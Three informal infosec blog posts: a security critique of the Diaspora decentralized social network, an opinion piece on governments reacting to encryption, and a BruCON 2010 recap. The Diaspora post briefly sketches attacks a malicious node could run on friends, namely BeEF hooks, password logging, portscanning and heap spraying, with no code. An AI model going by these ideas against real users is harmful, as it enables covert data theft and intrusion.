>Diaspora — a FAILtale perspective

>I was talking with some friends this morning about Diaspora, the social networking project that’s gotten some attention in the press lately. We were kicking around a couple of its pros and cons, and I promised that I would write a quick brief about it – one that I started a few hours ago and, after some thought, have re-crafted into a blog post… Without further ado, here is my (preliminary!) perspective on the project:

From a purely conceptual point of view: 

Diaspora is a platform that allows you to share your social content in a place under your control. Like Facebook, Flickr, and other socnets, you have a “central place” for seeing what your friends are up to, sharing photos and what not; unlike other socnets, that central place isn’t run by someone else.

From a semi-technical point of view: 

the point of a social network is to share information. The easiest way to do that is to have all that information sitting in one place, in one single format, in one single repository. The concept that Diaspora brings to the table is not necessarily new: don’t centralize the content but rather the feed to the content. If you look at it that way, Diaspora is little more than a fancy CMS — but then again, so are social networks in general. The interesting thing is, Diaspora has the “social network” branding that’s made it (and its more traditional peers) that much more popular.

From a technical point of view: 

though the concept is not novel, the need is clearly there. Moxie Marlinspike gave a talk at Defcon this year which pretty much summed up the problem: the price of the comforts and practicality of today’s technology is privacy — Diaspora, as well as Marlinspike’s own project, Googlesharing, intend to spare us of this costly sacrifice. Such endeavors would hopefully make secure sharing of information more accessible to non-technical socnet-savvy folks who care about their privacy — and this may be more people than we think. From what I’ve come to understand, Diaspora’s proposal is an application of the peer-to-peer model to social networks. This does have several benefits beyond those highlighted above — for instance, Diaspora’s “infrastructure” would grow organically as it gains momentum, since most (if not all) of the content is hosted on users’ equipment.

From an infosec point of view: 

I would definitely love to move to a model that allows me to better control my private information — but I’d be careful to make sure that I’m not jumping out of the frying pan into the fire. Here are a few things to consider:

  • Most people don’t really know the first things about setting up a server environment which, judging by the FAQ, is a necessity. Unless you’re an IT puke, that means you’ll either be configuring your machine badly or not configuring it at all. Diaspora might propose a hosting service à la WordPress in the future, which to me kind of sounds like it defeats the purpose.
  • Owning your own decentralized seed is kind of like having a puppy: it doesn’t just take care of itself. It’s hard enough to get regular users to update their antivirus, let alone patch and maintain a server…
  • The biggest advantage of Diaspora is that, since your content is under your control, you can yank it off the ‘net whenever you damn well please. However, this sort of assumes that all seeds that connect to yours are benign, doesn’t it? What if one of your friends’ seeds has been compromised?
  • Decentralization of the infrastructure means that it is both harder to keep the environment consistent and practically impossible to perform adequate monitoring. If Diaspora issues a security patch, how will they insure that it gets applied within a reasonably short period of time? How can Diaspora pro-actively track and repel attacks if they’re unable to analyze data? It seems likely that this sort of support is not in the roadmap.
  • The environment is under user control – so what if you were to write a malicious seed in python (or even Diaspora’s native language, RoR) that collected data from people that have friended you? How sweet would it be to drop a BeEF hook in your page, log a few passwords, portscan people’s networks, or maybe even heap spray your “friends”? And who’s going to catch you at work?

That pretty much sums it up for me. All things said, I think it’s a wonderful idea, and sincerely hope that the work bears fruit. I’ll be looking into the source code and trying to contribute as soon as I get my ass in gear!!!

A few links related to the project:

>Of governments and their escalating reaction to encryption

>Stop me if you’ve heard this one:

what happens when governments start cracking down on encryption after a twenty-year hiatus?

Bad shit, if you ask me.

You might have heard about the teenager that got jailed for not disclosing his password in the UK. The way I see it, this goes along the same lines as the UAE banning blackberries on account of their not being able to snoop on people: governments are reacting to encryption in a more concrete manner than they have ever before. This is not to say that governments haven’t been allergic to the commercialization of encryption before — I remember reading an article in College about the shit Whit Diffie had to go through to develop public key cryptography, not to mention the countless outlawing and export bans. However, it seems to me that governments are switching tactics, moving from the legislative to the pragmatic at a dramatic pace. What has triggered this sudden (renewed) interest in encryption?

For some reason, I’m wondering if it’s not the whole Google vs. China debacle that’s stoked the fires of cyberwar — because let’s face it, crypto has always had a strong role in warfare. After all, cryptography is easily as old as its etymological language — ancient greek — possibly older.

Here’s my reasoning: the media hype about China spying on its dissidents reflects in a very public manner just how far its willing to go — this triggers the following reaction:
Increase in public awareness
  => increase in fear
           => increase in security
                    = opportunity for governments to finally do that shit they’ve been meaning to do.

Well, that’s all the conspiracy theorist in me has to say about that. Guess this whole “encryption” thing will blow over — but then again, what if it doesn’t? Does the actual application of laws imposed by the likes of the Patriot Act and RIPA not, in some way, confirm that we’re living in an Orwellian world?

>Brucon 2010: a recap

>I was at Brucon 2010 last week, and it was a blast!

The ambiance at the con was very much reminiscent of Defcon’s: people talking passionately about security in a relaxed, geek-and-caffeine-rich environment.

In the past, when attending infosec cons I tend to go to all the talks — this time, I decided to go to as many workshops as possible. I must say, I was not disappointed at all — while talks are often absolutely fascinating and wildly entertaining,  workshops provide a chance to understand something at a much deeper level and allow you to test your knowledge of the topic; it also allows the speaker to tune her content to the audience in a much more interactive manner, providing more, or less, background information according to the crowd’s grasp of the subject. For instance, during the malicious PDF analysis workshop, Didier Stevens provided an overview of the PDF structure and started working through his samples, but quickly started skipping through examples he thought were obvious and allotting more time to the ‘juicy bits’.

The best part of a workshop, I’ve found, is that it provides you with an environment in which it’s OK to try something new — and it’s alright to mess up. I walked out of the hardware hacking village with a profound sense of accomplishment, having learned how to solder with Mitch Altman and how to program Arduinos with Fish. I’ve always been a fan of all things electronic, but up to the day I actually learned how to solder, my grasp of what was truly involved was somewhat fuzzy — you look at things very differently once you know what goes into making them.

I’m not going to cover the talks in detail; Peter did a fantastic job of that, so here’s his post. You should definitely read about the following talks:

  • Mikko Hypponen’s recount of the last 25 years of malware — which was just amazing
  • Joe McCray’s “You spent all that money and you still got 0wned” presentation; better yet, wait until the video’s out — the guy’s hilarious
  • Stephan Chenette’s presentation of Fireshark was really good, because he not only goes over what his tool does but covers the concept behind what he calls “malicious ecosystems”
  • Dale Pearson’s head hacking presentation gave me a fresh perspective on just how far social engineering could go — spooky, really. Check out his site, it’s extremely cool!